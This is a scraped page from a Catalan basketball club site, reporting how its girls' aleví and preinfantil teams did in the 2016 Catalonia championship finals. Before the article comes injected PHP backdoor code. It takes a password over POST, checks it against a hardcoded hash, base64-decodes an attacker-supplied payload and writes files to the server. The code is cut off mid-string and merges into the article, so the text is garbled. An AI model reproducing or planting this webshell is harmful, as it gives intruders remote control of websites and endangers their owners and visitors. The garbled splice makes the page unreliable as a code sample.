function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'aleví femení i el preinfantil femení planten cara en les dures fases finals dels campionats de Catalunya - Tgn Bàsquet Club -

L’aleví femení i el preinfantil femení planten cara en les dures fases finals dels campionats de Catalunya

By
Updated: juny 8, 2016

Dos equips del TGN Bàsquet van competir aquest passat cap de setmana en els campionats de Catalunya, la màxima competició a nivell català i on s’accedeix després de guanyar els campionats de Tarragona o, com a mínim, quedar entre els millors.

Així, l’aleví femení O6 va fer història en acabar en quarta posició al campionat que es va celebrar a Sabadell. El conjunt que entrenen Iñaki Liarte i Lala López, que havia guanyat el campionat de Tarragona aleví i també el preinfantil —va haver de renunciar a la fase final del campionat de Catalunya d’aquest últim perquè coincidia amb l’altre—, va vèncer en el primer matx de la final a 8 al GEiEG Vermell per 65-64 en un partit en què sempre va anar a remolc però que va saber remuntar gràcies a la fortalesa mental de les seves jugadores. Les semifinals s’haurien de disputar contra el Barça CBS i el conjunt blaugrana no va donar cap mena de possibilitat a les noies del Sagrat Cor. La sortida del Barça va ser molt forta i, tot i que les tarragonines van millorar molt durant el partit, el resultat va ser de 42-86. El TGN Bàsquet quedava fora de la final. En el matx pel tercer i quart lloc el rival també era temible: l’Snatts Sant Adrià i el resultat també va ser molt evident, 88-49.

«Estem molt orgullosos de la temporada que hem fet però és en aquestes fases finals on aprens a competir. Això és un altre món. Nosaltres estem en una lliga on tenim un parell de partits complicats durant el curs i els equips de Barcelona han de jugar una final cada cap de setmana. Això es nota molt. De fet, tot i haver perdut tan clarament, una de les meves jugadores m’ha dit al final del matx: jo vull jugar partits així més sovint», explica Iñaki Liarte, que destaca que el seu equip està format per jugadores de la casa: «Nosaltres no fitxem. Tothom em preguntava d’on eren les jugadores i són nostres, formades a casa. De fet, de les 10 que formen l’equip, 8 són del Sagrat Cor i les altres 2 de l’escola Dominiques, un centre que està vinculat amb nosaltres, és a dir, les noies que volen fer bàsquet en aquesta escola passen a formar part dels nostres equips».

 

IMG-20160605-WA0002

L’èxit del club es referma amb la presència d’un altre equip, el preinfantil femení, a la fase final de Solsona. «Crec que el club està treballant bé. Tenim unes bones fornades de jugadores en aquestes edats, i més joves i tot, i això vol dir que fem les coses bé», diu Albert Gómez. El conjunt de Gómez, que havia quedat tercer al campionat de Tarragona —va perdre en semifinals amb l’equip de Liarte—, va perdre en quarts de final contra el Sant Nicolau (74-24), un fet que el deixava fora de les quatre primers posicions, però es va refer i va vèncer l’Olot en el següent matx (59-56) i va perdre, finalment, en el partit pel cinquè i sisè lloc contra el Lleida (49-61). «Vam començar molt nervioses i el Sant Nicolau ho va aprofitar. Amb tot, el ritme competitiu del nostre rival era superior. Vam millorar amb el pas dels minuts, però sense opcions de guanyar. Ens falta competir amb equips així a la nostra lliga perquè sinó arribes allí i no tens res a fer», diu Gómez que, però,  es va mostrar molt satisfet del seu equip: «Ningú s’esperava que arribéssim on hem arribat. Estic molt content de la progressió de les jugadores».

 

 

Fotos: Lluís Closa

 

FASE FINAL PREINFANTIL FEMENÍ

FASE FINAL ALEVÍ FEMENÍ

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *